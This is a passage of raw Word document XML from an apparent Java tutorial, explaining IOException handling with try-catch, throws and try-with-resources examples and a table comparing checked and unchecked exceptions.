        </w:rPr>
        <w:t>failure in input/output operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE99C0" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ading a file that doesn't exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD2526" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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riting to a read-only file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1647312C" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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etwork issues during IO operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44361CF5" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009E507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51245DA">
          <v:rect id="_x0000_i1610" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B01B0C7" w14:textId="7C761B55" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">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00DA2CC6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ways to Handle IOException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7B0F6" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009E507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0E8CF9">
          <v:rect id="_x0000_i1611" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CB225" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">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1. Using try-catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCB1B0A"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io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D95A86" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6272A550"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FileReaderExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633CD7B6"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302C3F4E"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C85532D"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leReader reader = new FileReader("file.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D4B5E6"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data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2852F626"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hile ((data = reader.read()) != -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B9CF1F"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char) data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B9E66"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0086322"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ader.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCFCC0C"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tch (IOException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD3A0C8"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IOException caught: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CBE9E0"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0D832AF"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11D242A"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60128C2" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009E507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42D897">
          <v:rect id="_x0000_i1612" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2585A1F3" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">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2. Using throws clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2AA57"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io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D94E4" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F594AA"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public class FileReaderExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355338D"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throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A74A03"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leReader reader = new FileReader("file.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF523A"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data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E922C4C"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hile ((data = reader.read()) != -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BA4669"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char) data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2C0C13"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DD81E41"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ader.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070D6614"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811C52A"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CC5A311"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Use this when you want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exception handling to the caller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D8F9A" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009E507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57BF22C">
          <v:rect id="_x0000_i1613" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="044AEB47" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">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Best Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4930BE96" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92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lways </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>close resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FileReader, BufferedReader, etc.) in a finally block or use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>try-with-resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java 7+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C5861" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009E507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F06493E">
          <v:rect id="_x0000_i1614" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA783E9" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">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Try-with-resources example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C7975"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io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C41FD" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318C6180"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FileReaderExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71853620"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1E7A6688"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ry (FileReader reader = new FileReader("file.txt")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC4174"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data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4927D502"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hile ((data = reader.read()) != -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18238DB6"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char) data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27004CBF"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18CF5C1"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tch (IOException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BCDA10"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IOException handled: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13064F56"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41E6091"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C6BA212" w14:textId="77777777" w:rsidR="0039688B" w:rsidRPr="00CE4B95" w:rsidRDefault="0039688B" w:rsidP="009E507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6DAAC39" w14:textId="4D04BCCB" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="73B6F5E8">
          <v:rect id="_x0000_i1615" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="018CE95D" w14:textId="5930F21A" w:rsidR="002D6AFA" w:rsidRPr="00CE4B95" w:rsidRDefault="009A06ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Toc196307683"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="002D6AFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifference between </w:t>
      </w:r>
      <w:r w:rsidR="00E3690F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002D6AFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">hecked </w:t>
      </w:r>
      <w:r w:rsidR="00E3690F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="002D6AFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">xception and </w:t>
      </w:r>
      <w:r w:rsidR="00E3690F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="002D6AFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">nchecked </w:t>
      </w:r>
      <w:r w:rsidR="00E3690F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="002D6AFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>xception?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w14:paraId="7E768782" w14:textId="56A1F9BA" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">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ere’s a clear and quick comparison between </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Checked Exception</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Unchecked Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243986A8" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009E31C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7D0EF50">
          <v:rect id="_x0000_i1616" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEF9B65" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31C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hecked vs Unchecked Excep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15"/>
        <w:gridCol w:w="3121"/>
        <w:gridCol w:w="4968"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="5891882B" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C294CA7" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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576E9023" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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hecked Exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="479C7717" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">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Unchecked Exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="01F3BC52" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6221B927" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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ckage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C8FDB6" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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lang.Exception (excluding RuntimeException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BA0237" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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lang.RuntimeException and its subclasses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="3A31FE69" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E8C3C13" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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hecked at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E99E23" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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ile-time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71649195" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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untime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="0C4FC8B4" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF9D099" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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ust Handle/Declare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CC437E0" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">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Yes – must use try-catch or declare with throws</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EA0725B" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">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No – not mandatory to handle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="44091082" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BD36B58" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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presents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28C9F386" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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ternal problems (I/O, DB, file not found, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66902C86" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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ogramming errors (null access, logic issues, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="6DA1D05C" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ACB206C" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DA796DE" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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OException, SQLException, ParseException</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31538F00" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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ullPointerException, ArithmeticException, ArrayIndexOutOfBoundsException</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="0F07DF55" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C33FB2" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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ustom Exception Inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="246F8D9F" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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tend Exception (not RuntimeException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6698CD46" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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tend RuntimeException</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C0F7EBF" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009E31C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579A5DC">
          <v:rect id="_x0000_i1617" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="397E2813" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31C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hecked Exception – Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D42DB4" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31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void readFile() throws IOException {</w:t>
      </w:r>
    </w:p>
